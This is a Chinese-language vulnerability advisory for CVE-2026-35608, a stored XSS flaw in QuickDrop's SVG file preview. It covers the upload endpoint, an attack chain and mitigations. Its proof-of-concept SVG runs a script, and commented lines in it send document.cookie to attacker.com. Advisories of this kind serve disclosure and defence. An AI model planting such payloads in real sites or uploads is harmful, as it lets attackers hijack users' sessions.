CVE-2026-35608 CVSS 6.1 中危

CVE-2026-35608 QuickDrop 存储型XSS漏洞

披露日期: 2026-04-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35608

漏洞类型

存储型跨站脚本

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

QuickDrop

漏洞概述

QuickDrop是一款易用的文件共享应用程序。在1.5.3版本之前，该应用的文件预览端点存在存储型XSS漏洞。攻击者可以通过/api/file/upload-chunk接口上传包含恶意JavaScript载荷的特制SVG文件。当任何用户（包括管理员）在应用程序中预览该文件时，恶意脚本将在应用程序域的上下文中自动执行。该漏洞允许攻击者窃取用户凭据、执行未授权操作或进行钓鱼攻击。官方已在1.5.3版本中修复此问题。

技术细节

该漏洞的根本原因是QuickDrop在处理SVG文件上传时缺乏 sufficient sanitization（充分净化）。SVG文件基于XML格式，允许嵌入<Script>标签。应用程序的/api/file/upload-chunk端点允许上传SVG，且文件预览功能直接渲染SVG内容而未进行严格的Content-Type检查或内容转义。攻击者构造一个包含JavaScript代码的SVG文件上传至服务器，该文件被存储在服务器端。当受害者访问文件预览链接时，浏览器解析SVG文档并执行其中的恶意脚本。由于CVSS向量包含S:C（范围变更），攻击者可利用受害者的会话权限访问更多敏感数据。

攻击链分析

STEP 1

1. 准备阶段

攻击者准备一个包含恶意JavaScript代码的SVG文件。

STEP 2

2. 上传恶意文件

攻击者利用QuickDrop的/api/file/upload-chunk接口上传构造好的恶意SVG文件。

STEP 3

3. 诱导访问

攻击者诱导受害者（如管理员或注册用户）访问该上传文件的预览链接。

STEP 4

4. 执行攻击

受害者浏览器在加载预览页面时解析SVG，执行其中的恶意脚本，窃取Session或执行操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<svg xmlns="http://www.w3.org/2000/svg">
  <script>
    // Proof of Concept for CVE-2026-35608
    alert('XSS Executed in QuickDrop');
    
    // Example payload to exfiltrate cookies
    // var img = new Image();
    // img.src = "http://attacker.com/?c=" + document.cookie;
    // document.body.appendChild(img);
  </script>
</svg>

影响范围

QuickDrop < 1.5.3

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用SVG文件上传功能或文件预览功能。管理员应审查服务器中已存在的SVG文件，确保没有可疑内容。用户应避免点击预览来源不明的文件。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表